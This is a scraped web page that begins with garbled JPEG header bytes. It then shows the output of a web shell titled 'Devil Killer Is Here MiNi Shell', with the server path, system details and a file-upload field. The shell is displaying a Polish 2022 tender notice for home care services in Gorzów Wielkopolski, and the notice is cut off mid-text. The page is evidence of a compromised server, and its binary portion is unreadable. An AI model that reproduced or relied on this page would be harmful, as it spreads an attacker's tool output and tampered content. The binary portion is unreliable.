JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221205/0047656401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „ŚWIADCZENIE USŁUG OPIEKUŃCZYCH I SPECJALISTYCZNYCH USŁUG OPIEKUŃCZYCH NA RZECZ PODOPIECZNYCH GORZOWSKIEGO CENTRUM POMOCY RODZINIE W GORZOWIE WLKP. W MIEJSCU ZAMIESZKANIA ŚWIADCZENIOBIORCY” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Gorzów Wlkp. - Gorzowskie Centrum Pomocy Rodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003131062</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Walczaka 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorzów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gcprgorzow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gcpr.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ŚWIADCZENIE USŁUG OPIEKUŃCZYCH I SPECJALISTYCZNYCH USŁUG OPIEKUŃCZYCH NA RZECZ PODOPIECZNYCH GORZOWSKIEGO CENTRUM POMOCY RODZINIE W GORZOWIE WLKP. W MIEJSCU ZAMIESZKANIA ŚWIADCZENIOBIORCY” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0cd18b66-7423-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00476564</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 1) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 2) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 3) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 4) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 5) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 6) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 7) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 8) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 9) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 10) ustawy</p> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie będzie prowadzone z wykorzystaniem portalu<br/>https://miniportal.uzp.gov.pl oraz platformy ePUAPu. Adres zamawiającego na platformie ePUAP : /GCPRIPS/skrytka<br/>W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>wskazanych portali. Wykonawcy zobowiązani są do używania platformy ePUAP do komunikowania się<br/>z zamawiającym. Zamawiający w<br/>zakresie komunikacji zakłada wykorzystanie Formularzy dostępnych na platformie ePUAP oraz na<br/>miniPortalu w zakładce „Formularze do komunikacji”. W związku z tym wykonawcy zobligowani są na<br/>bieżąco sprawdzać skrzynkę ePUAP z której złożona<br/>została oferta lub inną, jeżeli wskazali ją do kontaktu.<br/>Szczegółowe instrukcje dotyczące komunikacji i składania dokumentów znajdują się w Rozdziałach 4 i 17 SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający w zakresie komunikacji<br/>zakłada wykorzystanie Formularzy dostępnych na platformie<br/>ePUAP oraz na miniPortalu w zakładce „Formularze do komunikacji”. Zamawiający z zastrzeżeniem<br/>poniższych zapisów, nie dopuszcza innej formy komunikacji z wykonawcami.<br/>W związku z tym wykonawcy zobligowani są na bieżąco sprawdzać skrzynkę ePUAP z której złożona<br/>została oferta.<br/>Wymagania techniczne i organizacyjne narzędzi wykorzystywanych w ramach postępowania dostępne<br/>na stronach &#34;https://epuap.gov.pl/wps/portal” oraz &#34;https://miniportal.uzp.gov.pl&#34;<br/>Szczegółowe instrukcje dotyczące komunikacji i składania dokumentów znajdują się w Rozdziałach 4 i 17 SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl ; https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziale 25 SWZ: &#34;25.1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Gorzowskie Centrum Pomocy Rodzinie z siedzibą ul. Walczaka 42, 66-400<br/>Gorzów Wielkopolski<br/>1. inspektorem ochrony danych osobowych jest Pan Robert Kędzior , e-mail: iodo@gcprgorzow.pl<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie niniejszego zamówienia publicznego znak sprawy DO.271.13.2022 prowadzonym w trybie podstawowym (art. 275 pkt 1 w<br/>zw. art. 359 pkt 2 ustawy Pzp).<br/>3. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>6. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7. posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.&#34;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DO.271.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług opiekuńczych na rzecz podopiecznych Gorzowskiego Centrum Pomocy Rodzinie w miejscu zamieszkania świadczeniobiorcy, których istotą jest wykonywanie niezbędnych czynności życia codziennego na rzecz osób, które z powodu wieku, choroby lub innych przyczyn wymagają pomocy innych osób. <br/>Szczegółowy opis przedmiotu zamówienia znajduje się w Rozdziale 7 i Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 2739744,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75310000-2 - Świadczenia społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zgodnie z treścią SWZ: &#34;7.3.1. Zamawiający zastrzega sobie prawo opcji w okresie realizacji zamówienia (prawo zmiany przedmiotu zamówienia w zakresie ilościowym z powodów ekonomicznych lub bieżących potrzeb w zależności od ilości osób ubiegających się/kwalifikujących się do pomocy w formie usług opiekuńczych):<br/>1) Zamawiający zastrzega sobie prawo do zwiększenia ilości zleconych usług opiekuńczych lub specjalistycznych usług opiekuńczych w wymiarze nieprzekraczającym 5 % liczby godzin lub liczby osób wskazanej w pkt. 7.1.3. tiret pierwsze ( Część I)&#34;<br/><br/>Szczegóły znajdują się w Rozdziale 7 pkt 7.3. SWZ i Załączniku nr 8 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium stażu pracy (SP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium doświadczenia (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie specjalistycznych usług opiekuńczych ( pielęgnacyjnych ) na rzecz podopiecznych Gorzowskiego Centrum Pomocy Rodzinie w miejscu zamieszkania świadczeniobiorcy dostosowanych do szczególnych potrzeb wynikających z rodzaju schorzenia lub niepełnosprawności,<br/><br/>Szczegółowy opis w Rozdziale 7 SWZ oraz Załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 195652,80 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75310000-2 - Świadczenia społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo opcji w okresie realizacji zamówienia (prawo zmiany przedmiotu zamówienia w zakresie ilościowym z powodów ekonomicznych lub bieżących potrzeb w zależności od ilości osób ubiegających się/kwalifikujących się do pomocy w formie usług opiekuńczych):<br/>1) Zamawiający zastrzega sobie prawo do zwiększenia ilości zleconych usług opiekuńczych lub specjalistycznych usług opiekuńczych w wymiarze nieprzekraczającym 5 % liczby godzin lub liczby osób wskazanej w pkt. 7.1.3. tiret drugie (Część II)<br/><br/>Szczegóły znajdują się w Rozdziale 7 SWZ oraz w załączniku nr 9 do SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">20.1. Kryterium oceny oferty - Część I ”Świadczenie usług opiekuńczych na rzecz podopiecznych Gorzowskiego Centrum Pomocy Rodzinie w miejscu zamieszkania świadczeniobiorcy”<br/><br/><br/>20.1.1. Zamawiający wyznaczył następujące kryterium i jego znaczenie, które będzie brane pod uwagę przy ocenie ofert:<br/><br/>I. Cena brutto oferty (CO) – 60% wagi<br/> • <br/>II. Kryterium stażu pracy (SP) – ocenie podlegać będzie staż pracy osób, które będą wykonywały usługi - 30 % wagi<br/>Dane/wartości służące ocenie oferty zawarte muszą być w załączniku nr 6 do SWZ pn. Wykaz osób<br/>III. Kryterium doświadczenia (D) – ocenie podlegać będzie ilość usług wykazanych w załączniku nr 7 do SWZ pn. Wykaz usług ­ - 10 % wagi<br/><br/>20.1.2. Sposób oceny ofert:<br/>Ofertom przyznawane będą punkty. <br/><br/>Punktacja z tytułu oferowanej ceny:<br/><br/>1) Kryterium „Cena brutto oferty” – oferta z najniższą ceną uzyska 60 pkt, pozostałe oferty proporcjonalnie mniej w skali od 0 – 60 pkt.<br/><br/> Cena brutto oferty z najniższą ceną<br/>CO =	------------------------------------------------ x 100 x 60 %<br/> cena brutto oferty ocenianej<br/><br/>2) Kryterium stażu pracy (SP)– oferta w której osoby skierowane do wykonywania usług będą mieli średni najwyższy staż pracy otrzyma 30 pkt, pozostałe oferty proporcjonalnie mniej w skali od 0 – 30 pkt.<br/>	Najwyższy średni staż pracy<br/>SP = ------------------------------------------- x100 x 30 %<br/>	Oceniany średni staż pracy <br/><br/>* Obliczając średni staż pracy Zamawiający zsumuje staż pracy wszystkich osób wskazanych w załączniku nr 6 do SWZ, a następnie uzyskany wynik podzieli przez ilość tych osób;<br/><br/>3) Kryterium doświadczenia (D) – punkty zostaną przyznane w zależności od ilości zadeklarowanych usług podobnych zrealizowanych przez Wykonawce, w ten sposób:<br/>- jeżeli Wykonawca wykonywał 4 i więcej usług podobnych otrzyma 10 pkt<br/>- jeżeli Wykonawca wykonywał 2-3 usług podobnych otrzyma 7 pkt<br/>- jeżeli Wykonawca wykonywał 1 usługę podobną otrzyma 4 pkt <br/><br/><br/>20.2.Kryterium oceny ofert -Część II „Świadczenie specjalistycznych usług opiekuńczych ( pielęgnacyjnych ) na rzecz podopiecznych Gorzowskiego Centrum Pomocy Rodzinie w miejscu zamieszkania świadczeniobiorcy” <br/><br/>20.2.1. Zamawiający wyznaczył następujące kryterium i jego znaczenie, które będzie brane pod uwagę przy ocenie ofert:<br/><br/>I. Cena brutto oferty (CO) – 60% wagi<br/> • <br/>II. Kryterium stażu pracy (SP) – ocenie podlegać będzie staż pracy osób, które będą wykonywały usługi - 30 % wagi<br/>Dane/wartości służące ocenie oferty zawarte muszą być w załączniku nr 6 do SWZ pn. Wykaz osób<br/>III. Kryterium doświadczenia (D) – ocenie podlegać będzie ilość usług wykazanych w załączniku nr 7 do SWZ pn. Wykaz usług ­ - 10 % wagi<br/><br/>20.2.2. Sposób oceny ofert:<br/>Ofertom przyznawane będą punkty. <br/><br/>Punktacja z tytułu oferowanej ceny:<br/><br/>1) Kryterium „Cena brutto oferty” – oferta z najniższą ceną uzyska 60 pkt, pozostałe oferty proporcjonalnie mniej w skali od 0 – 60 pkt.<br/><br/> Cena brutto oferty z najniższą ceną<br/>CO =	------------------------------------------------ x 100 x 60 %<br/><br/><br/>2) Kryterium stażu pracy (SP)– oferta w której osoby skierowane do wykonywania usług będą mieli średni najwyższy staż pracy otrzyma 30 pkt, pozostałe oferty proporcjonalnie mniej w skali od 0 – 30 pkt.<br/>	Najwyższy średni staż pracy<br/>SP = ------------------------------------------- x100 x 30 %<br/>	Oceniany średni staż pracy <br/><br/>* Obliczając średni staż pracy Zamawiający zsumuje staż pracy wszystkich osób wskazanych w załączniku nr 6 do SWZ, a następnie uzyskany wynik podzieli przez ilość tych osób;<br/><br/>3) Kryterium doświadczenia (D) – punkty zostaną przyznane w zależności od ilości zadeklarowanych usług podobnych zrealizowanych przez Wykonawce, w ten sposób:<br/>- jeżeli Wykonawca wykonywał 4 i więcej usług podobnych otrzyma 10 pkt<br/>- jeżeli Wykonawca wykonywał 2-3 usług podobnych otrzyma 7 pkt<br/>- jeżeli Wykonawca wykonywał 1 usługę 